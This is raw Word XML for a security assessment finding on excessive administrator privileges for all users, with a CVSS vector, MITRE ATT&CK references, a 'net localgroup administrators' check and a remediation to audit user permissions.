        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="34021F7A" w:rsidP="0D325B6E" w:rsidRDefault="34021F7A" w14:paraId="2CC61515" w14:textId="17725458">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="34021F7A">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="34021F7A">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">H1: Unnecessary Administrator </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="17C01C19">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Privileges</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="34021F7A">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for All Users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35C33B1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4DC768" w14:textId="1F45F7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E3F4D3" w14:textId="6D440D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83C6D8" w14:textId="6A0AC6F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0417C64">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E704A5" w14:textId="5D5090B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899C707" w14:textId="4F85F045">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398CA52" w14:textId="2BD0ECB3">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26364048">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>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CC115B4" w14:textId="67366921">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115A599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6A876F6" w14:textId="20278D5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44DC091" w14:textId="70CCF7AC">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6D54A32"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4335" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75E87899"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="3587F34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AEE5CC3" w14:textId="67940CD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0FFAA1B" w:rsidP="0D325B6E" w:rsidRDefault="30FFAA1B" w14:paraId="2EB06FEC" w14:textId="3FD31B66">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L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" r:id="R93dae00836c349b5">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="30FFAA1B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="30FFAA1B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="0693B6C5">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70B9C36" w14:textId="387F5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B694F41" w14:textId="4F24597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94FE1AA" w:rsidP="0D325B6E" w:rsidRDefault="394FE1AA" w14:paraId="03CF1155" w14:textId="31D0F991">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R542c7f00c4aa4f98">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="394FE1AA">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1078: Valid Accounts</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="7C185F70">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5A2C3DD"/>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F6CE35" w14:textId="1D6D1C5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2B252A2" w:rsidP="0D325B6E" w:rsidRDefault="32B252A2" w14:paraId="08806F69" w14:textId="4A7EBA7E">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5e66c8323ab44b5c">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="32B252A2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1026: Privileged Account Management</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="32B252A2" w:rsidP="0D325B6E" w:rsidRDefault="32B252A2" w14:paraId="3E6E9C1A" w14:textId="5514013C">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9b021a3c88774030">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="32B252A2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1018: User Account Management</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="32B252A2">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52A3AFFF">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217F07" w14:textId="2BEB1093">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F5186F9" w14:textId="563C0AA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6163CB62" w14:textId="08100F85"/>
    <w:p w:rsidR="34021F7A" w:rsidP="0D325B6E" w:rsidRDefault="34021F7A" w14:paraId="245BFAC9" w14:textId="10E27B45">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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590FEC1" w:rsidP="0D325B6E" w:rsidRDefault="6590FEC1" w14:paraId="08020F96" w14:textId="38DCD0F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90FEC1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">All users on the system currently </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6590FEC1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>possess</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6590FEC1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> administrative privileges. </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6C60DFF6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="74DF4C40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allows</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6C60DFF6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> any user on the system to be able to modify key parts of the system, as well as view all sensitive information present on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1726B74B" w14:textId="339C0E9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4021F7A" w:rsidP="0D325B6E" w:rsidRDefault="34021F7A" w14:paraId="4DCE86C2" w14:textId="44E61ADE">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84B3A57" w:rsidP="0D325B6E" w:rsidRDefault="284B3A57" w14:paraId="2EB74078" w14:textId="17BCE50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84B3A57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The system directly violates the Principle of Least Privilege by allowing </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6A24A0D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>non-administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="284B3A57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> users </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1AC1649E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to have administrative access to the system. This compromises confidentiality and integrity, as any user can view and manipulate sensitive data</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5A5C6ADD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the system. This also enables an attacker </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="305F8DF2">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305F8DF2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>immediately</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="305F8DF2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> have administrator access if gaining unauthorized access to any user on the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="305F8DF2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="305F8DF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76D08C16" w14:textId="15790EB9">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021F7A" w:rsidP="0D325B6E" w:rsidRDefault="34021F7A" w14:paraId="00350E65" w14:textId="3E616A1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4021F7A" w:rsidP="0D325B6E" w:rsidRDefault="34021F7A" w14:paraId="6E540DB8" w14:textId="3A3199D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22191624">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>List all users</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="05B5908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9FF57E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">with Administrator privileges </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="05B59082">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">using ‘net </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="23A74CB3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>localgroup</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="23A74CB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0AE2885">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>administrators’</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="50AE2885">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="22191624" w:rsidP="0D325B6E" w:rsidRDefault="22191624" w14:paraId="4CBF3AC4" w14:textId="3DCC49F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191624">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1AEF65A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Check for</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2219162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2191624">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admi</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="35018079">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nist</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="22191624">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rative access</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="25A3912D">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62375DD6" w14:textId="656DDA32">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78E322F8" w14:textId="5A8D7F93">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021F7A" w:rsidP="0D325B6E" w:rsidRDefault="34021F7A" w14:paraId="483732C1" w14:textId="1E70858D">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4021F7A" w:rsidP="0D325B6E" w:rsidRDefault="34021F7A" w14:paraId="25CF691B" w14:textId="65D6CEE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4021F7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4021F7A" w:rsidP="0D325B6E" w:rsidRDefault="34021F7A" w14:paraId="52EA67C6" w14:textId="0DBFCECD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>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0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit user permissions </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BB08A1F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">o </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 xml:space="preserve">that </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non-administrator user</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="55F74E28">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DE75030">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>do</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 xml:space="preserve"> not have administrative access </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="13DDA323">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to</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 xml:space="preserve"> t</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="30B5AD11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>he system</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="188093A6">
